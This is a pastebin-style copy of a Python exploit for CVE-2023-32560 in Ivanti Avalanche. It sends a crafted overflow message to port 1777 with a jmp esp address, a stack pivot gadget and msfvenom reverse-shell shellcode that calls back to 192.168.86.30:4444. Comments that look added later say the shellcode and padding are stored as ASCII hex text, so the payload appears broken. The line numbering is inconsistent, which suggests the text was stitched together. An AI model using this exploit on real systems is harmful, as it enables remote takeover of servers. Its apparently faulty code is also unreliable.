
Ivanti Avalanche <v6.4.0.0 - Remote Code Execution - CVE-2023-32560

Jan 21st, 2024
  1. """
  2. Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
  3. Date: 2023-08-16
  4. Exploit Author: Robel Campbell (@RobelCampbell)
  5. Vendor Homepage: https://www.ivanti.com/
  6. Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
  7. Version: v6.4.0.0
  8. Tested on: Windows 11 21H2
  9. CVE: CVE-2023-32560
  10. Reference: https://www.tenable.com/security/research/tra-2023-27
  11. """
  12.  
  13. import socket
  14. import struct
  15. import sys
  16.  
  17. # Create an item structure for the header and payload
class Item:
    """One ``type / name / value`` record as this script encodes it.

    The name and value are written with fixed widths (5 and 0x800 bytes):
    ``struct`` NUL-pads a shorter input and silently truncates a longer one,
    so the size words on the wire never reflect the real lengths passed in.
    """

    NAME_WIDTH = 0x5
    VALUE_WIDTH = 0x800

    def __init__(self, type_, name, value):
        self.type = type_
        self.name = name.encode()
        self.value = value
        self.name_size = self.NAME_WIDTH
        self.value_size = self.VALUE_WIDTH

    def pack(self):
        """Return big-endian ``type, name_size, value_size`` followed by the
        fixed-width name and value fields."""
        layout = '>III%ds%ds' % (self.name_size, self.value_size)
        fields = (self.type, self.name_size, self.value_size, self.name, self.value)
        return struct.pack(layout, *fields)
  29.  
  30. # Create a header structure
class HP:
    """Header items followed by payload items, then NUL padding.

    The pad length is derived from the *number* of items in the two lists
    (``len`` of the lists), not from their encoded byte length, so it is
    always 1..16 bytes and does not align the encoded data to 16 bytes.
    """

    def __init__(self, hdr, payload):
        self.hdr = hdr
        self.payload = payload
        item_count = len(hdr) + len(payload)
        self.pad = bytes(16 - item_count % 16)

    def pack(self):
        """Concatenate every header item, every payload item and the pad."""
        chunks = [item.pack() for item in self.hdr]
        chunks.extend(item.pack() for item in self.payload)
        chunks.append(self.pad)
        return b''.join(chunks)
  40.  
  41. # Create a preamble structure
class Preamble:
    """16-byte message prefix: total size, header bytes, payload bytes, zero.

    ``hdr_size`` and ``payload_size`` are the encoded lengths of the items
    in ``hp.hdr`` and ``hp.payload``; ``msg_size`` is the encoded length of
    ``hp`` (which includes its pad) plus 16, presumably for this preamble.
    """

    def __init__(self, hp):
        encoded = hp.pack()
        self.msg_size = 16 + len(encoded)
        self.hdr_size = sum(len(item.pack()) for item in hp.hdr)
        self.payload_size = sum(len(item.pack()) for item in hp.payload)
        self.unk = 0  # Unknown value; always written as zero

    def pack(self):
        """Return the four fields as big-endian 32-bit words."""
        return struct.pack('>4I', self.msg_size, self.hdr_size, self.payload_size, self.unk)
  51.  
  52. # Create a message structure
class Msg:
    """Complete message: a Preamble computed from ``hp`` followed by ``hp`` itself."""

    def __init__(self, hp):
        self.hdrpay = hp
        self.pre = Preamble(hp)

    def pack(self):
        """Return preamble bytes followed by the header/payload bytes."""
        parts = (self.pre.pack(), self.hdrpay.pack())
        return b''.join(parts)
  60.  
  61. # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
# Reverse-shell stage as emitted by the msfvenom command above, kept as hex
# text (ASCII digits) rather than raw bytes; it is appended to buf verbatim.
shellcode =  b""
shellcode += b"fce8820000006089e531c064"
shellcode += b"8b50308b520c8b52148b7228"
shellcode += b"0fb74a2631ffac3c617c022c"
shellcode += b"20c1cf0d01c7e2f252578b52"
shellcode += b"108b4a3c8b4c1178e34801d1"
shellcode += b"518b592001d38b4918e33a49"
shellcode += b"8b348b01d631ffacc1cf0d01"
shellcode += b"c738e075f6037df83b7d2475"
shellcode += b"e4588b582401d3668b0c4b8b"
shellcode += b"581c01d38b048b01d0894424"
shellcode += b"245b5b61595a51ffe05f5f5a"
shellcode += b"8b12eb8d5d68333200006877"
shellcode += b"73325f54684c772607ffd5b8"
shellcode += b"9001000029c454506829806b"
shellcode += b"00ffd5505050504050405068"
shellcode += b"ea0fdfe0ffd5976a0568c0a8"
shellcode += b"561e680200115c89e66a1056"
shellcode += b"576899a57461ffd585c0740c"
shellcode += b"ff4e0875ec68f0b5a256ffd5"
shellcode += b"68636d640089e357575731f6"
shellcode += b"6a125956e2fd66c744243c01"
shellcode += b"018d442410c6004454505656"
shellcode += b"5646564e565653566879cc3f"
shellcode += b"86ffd589e04e5646ff306808"
shellcode += b"871d60ffd5bbe01d2a0a68a6"
shellcode += b"95bd9dffd53c067c0a80fbe0"
shellcode += b"7505bb4713726f6a0053ffd5"

# Value of the header item. Every literal here is ASCII hex text, so the
# bytes on the wire are printable: b'90' * 340 is 680 bytes of the
# characters '9' and '0', b'41' * 80 is 160 bytes of '4' and '1'.
buf = b'90' * 340
buf += b'812b4100' # jmp esp (0x00412b81)
buf += b'90909090'
buf += b'90909090'
buf += shellcode
buf += b'41' * 80
buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
# Pad with b'43' up to exactly 0x800 bytes, the fixed Item.value_size.
buf += b'43' * (0x800 - len(buf))

# Second item value. Item packs only value_size (0x800) bytes, so struct
# truncates this 0x1000-byte buffer when the message is built.
buf2 = b'41' * 0x1000

# Create message payload
hdr = [Item(3, "pwned", buf)]
payload = [Item(3, "pwned", buf2)] # dummy payload, probably not necessary
hp_instance = HP(hdr, payload)
# Resulting message for a network signature: 16-byte preamble + two items of
# (12 + 5 + 0x800) bytes + 14 pad bytes (HP pads by item count) = 4160 bytes,
# both items named "pwned", sent in a single write below.
msg_instance = Msg(hp_instance)

# Default port; only the host is taken from the command line
port = 1777

# check for target host argument
if len(sys.argv) > 1:
    host = sys.argv[1]
else:
    print("Usage: python3 CVE-2023-32560.py <host ip>")
    sys.exit()  # no status given, so the usage error still exits 0

# Single TCP connection: one sendall, nothing is read back before exit.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(msg_instance.pack())
    print("Message sent!")
    s.close()  # redundant: the with-block already closes the socket
  123.            